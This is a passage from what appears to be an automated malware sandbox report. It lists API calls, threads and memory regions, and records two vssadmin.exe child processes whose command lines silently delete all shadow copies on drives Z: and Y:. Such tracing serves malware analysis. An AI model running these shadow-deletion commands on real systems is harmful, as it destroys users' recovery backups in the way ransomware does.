	[0284.261] free (_Block=0x7724b8) 
	[0284.261] free (_Block=0x7786b0) 
	[0284.261] free (_Block=0x778728) 
	[0284.261] free (_Block=0x772418) 
	[0284.262] free (_Block=0x772cc8) 
	[0284.262] free (_Block=0x778980) 
	[0284.262] free (_Block=0x772658) 
	[0284.262] free (_Block=0x778788) 
	[0284.262] free (_Block=0x778908) 
	[0284.262] free (_Block=0x772358) 
	[0284.262] free (_Block=0x778800) 
	[0284.262] free (_Block=0x778698) 
	[0284.263] free (_Block=0x7726b8) 
	[0284.263] free (_Block=0x778830) 
	[0284.263] free (_Block=0x778818) 
	[0284.263] free (_Block=0x772698) 
	[0284.263] free (_Block=0x772bc0) 
	[0284.263] free (_Block=0x772bd8) 
	[0284.263] free (_Block=0x772518) 
	[0284.263] free (_Block=0x772d10) 
	[0284.264] free (_Block=0x772c80) 
	[0284.264] free (_Block=0x772458) 
	[0284.264] free (_Block=0x772cf8) 
	[0284.264] free (_Block=0x772c20) 
	[0284.264] free (_Block=0x7723b8) 
	[0284.264] free (_Block=0x772c98) 
	[0284.264] free (_Block=0x772b60) 
	[0284.264] free (_Block=0x772558) 
	[0284.265] free (_Block=0x772bf0) 
	[0284.265] free (_Block=0x772c38) 
	[0284.265] free (_Block=0x7725b8) 
	[0284.265] free (_Block=0x772d28) 
	[0284.265] free (_Block=0x772c50) 
	[0284.265] free (_Block=0x772678) 
	[0284.265] free (_Block=0x772b78) 
	[0284.265] free (_Block=0x772b90) 
	[0284.266] free (_Block=0x772478) 
	[0284.266] free (_Block=0x772ba8) 
	[0284.266] free (_Block=0x772c08) 
	[0284.266] free (_Block=0x772398) 
	[0284.266] free (_Block=0x772c68) 
	[0284.266] free (_Block=0x772cb0) 
	[0284.266] free (_Block=0x772498) 
	[0284.266] CoUninitialize () 
	[0290.079] exit (_Code=-2147217388) 
	[0290.080] free (_Block=0x778a70) 
	[0290.081] free (_Block=0x771160) 
	[0290.081] ??1CHString@@QAE@XZ () returned 0x6f886260
	[0290.082] free (_Block=0x770550) 
	[0290.082] free (_Block=0x773d38) 
	[0290.082] free (_Block=0x771140) 
	[0290.082] free (_Block=0x771120) 
	[0290.083] free (_Block=0x7710f0) 
	[0290.083] free (_Block=0x7710d0) 
	[0290.083] free (_Block=0x7710a0) 
	[0290.083] free (_Block=0x771060) 
	[0290.091] free (_Block=0x771040) 
	[0290.091] ??1CHString@@QAE@XZ () returned 0x6f886260
	[0290.091] free (_Block=0x778ba0) 

Thread:
	id = 74
	os_tid = 0x100c


Thread:
	id = 111
	os_tid = 0x558


Thread:
	id = 112
	os_tid = 0x2b4


Thread:
	id = 113
	os_tid = 0x804


Thread:
	id = 114
	os_tid = 0x604


Process:
	id = "22"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x31305000"
	os_pid = "0x12a4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "6"
	os_parent_pid = "0x12cc"
	cmd_line = "vssadmin  Delete Shadows /For=Z: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1547
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 1548
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 1549
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 1550
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 1551
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 1552
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 1553
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 1554
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 1555
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 1556
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 1557
	        start_va = 0x4880000
	          end_va = 0x4881fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 1558
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 1559
	        start_va = 0x7fc00000
	          end_va = 0x7fc22fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007fc00000"
	        filename = ""

Region:
	              id = 1560
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1561
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 1562
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 1563
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1564
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 1571
	        start_va = 0x400000
	          end_va = 0x50ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 1572
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 1578
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 1579
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1580
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 1603
	        start_va = 0x4890000
	          end_va = 0x49dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004890000"
	        filename = ""

Region:
	              id = 1604
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1605
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 1610
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 1611
	        start_va = 0x7fb00000
	          end_va = 0x7fbfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007fb00000"
	        filename = ""

Region:
	              id = 1679
	        start_va = 0x100000
	          end_va = 0x1bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1680
	        start_va = 0x4880000
	          end_va = 0x4883fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 1681
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 1682
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 1683
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 1684
	        start_va = 0x400000
	          end_va = 0x43ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 1685
	        start_va = 0x500000
	          end_va = 0x50ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000500000"
	        filename = ""

Region:
	              id = 1686
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 1687
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 1716
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 1717
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 1718
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 1719
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 1720
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 1721
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 1727
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 1728
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 1729
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 1730
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 1731
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 1732
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 1733
	        start_va = 0x49e0000
	          end_va = 0x4b9ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000049e0000"
	        filename = ""

Region:
	              id = 1766
	        start_va = 0x510000
	          end_va = 0x697fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000510000"
	        filename = ""

Region:
	              id = 1767
	        start_va = 0x4890000
	          end_va = 0x48b9fff
	       monitored = 0
	     entry_point = 0x4895680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 1768
	        start_va = 0x48e0000
	          end_va = 0x49dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048e0000"
	        filename = ""

Region:
	              id = 1769
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 1770
	        start_va = 0x6a0000
	          end_va = 0x820fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000006a0000"
	        filename = ""

Region:
	              id = 1771
	        start_va = 0x4890000
	          end_va = 0x489cfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 1772
	        start_va = 0x4ba0000
	          end_va = 0x5f9ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004ba0000"
	        filename = ""

Region:
	              id = 1773
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 1774
	        start_va = 0x440000
	          end_va = 0x440fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000440000"
	        filename = ""

Region:
	              id = 1775
	        start_va = 0x48a0000
	          end_va = 0x48a3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048a0000"
	        filename = ""

Region:
	              id = 1776
	        start_va = 0x49e0000
	          end_va = 0x4ac9fff
	       monitored = 0
	     entry_point = 0x4a1d650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 1777
	        start_va = 0x4b90000
	          end_va = 0x4b9ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004b90000"
	        filename = ""

Region:
	              id = 1872
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 2402
	        start_va = 0x48b0000
	          end_va = 0x48b0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000048b0000"
	        filename = ""

Region:
	              id = 2403
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 2404
	        start_va = 0x48c0000
	          end_va = 0x48c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000048c0000"
	        filename = ""

Region:
	              id = 2421
	        start_va = 0x450000
	          end_va = 0x48ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000450000"
	        filename = ""

Region:
	              id = 2422
	        start_va = 0x490000
	          end_va = 0x4cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000490000"
	        filename = ""

Region:
	              id = 2427
	        start_va = 0x49e0000
	          end_va = 0x4a1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000049e0000"
	        filename = ""

Region:
	              id = 2428
	        start_va = 0x4a20000
	          end_va = 0x4a5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a20000"
	        filename = ""

Region:
	              id = 2429
	        start_va = 0x4a60000
	          end_va = 0x4a9ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a60000"
	        filename = ""

Region:
	              id = 2430
	        start_va = 0x4aa0000
	          end_va = 0x4adffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004aa0000"
	        filename = ""

Region:
	              id = 2992
	        start_va = 0x5fa0000
	          end_va = 0x607ffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 2997
	        start_va = 0x4ae0000
	          end_va = 0x4b5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004ae0000"
	        filename = ""

Region:
	              id = 2998
	        start_va = 0x48d0000
	          end_va = 0x48d8fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vsstrace.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vsstrace.dll.mui")


Thread:
	id = 76
	os_tid = 0x1024


Thread:
	id = 82
	os_tid = 0x494


Thread:
	id = 115
	os_tid = 0xacc


Thread:
	id = 117
	os_tid = 0x340


Thread:
	id = 118
	os_tid = 0xb94


Process:
	id = "23"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x5c7f1000"
	os_pid = "0x1028"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "8"
	os_parent_pid = "0xdcc"
	cmd_line = "vssadmin  Delete Shadows /For=Y: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1582
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 1583
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 1584
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 1585
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 1586
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 1587
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 1588
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 1589
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 1590
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 1591
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 1592
	        start_va = 0x4880000
	          end_va = 0x4881fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 1593
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 1594
	        start_va = 0x7f2c0000
	          end_va = 0x7f2e2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f2c0000"
	        filename = ""

Region:
	              id = 1595
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1596
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 1597
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 1598
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1599
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 1606
	        start_va = 0x400000
	          end_va = 0x57ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 1607
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 1608
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 1612
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1613
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 1633
	        start_va = 0x4890000
	          end_va = 0x49dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004890000"
	        filename = ""

Region:
	              id = 1634
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1639
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 1640
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 1641
	        start_va = 0x7f1c0000
	          end_va = 0x7f2bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f1c0000"
	        filename = ""

Region:
	              id = 1734
	        start_va = 0x100000
	          end_va = 0x1bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
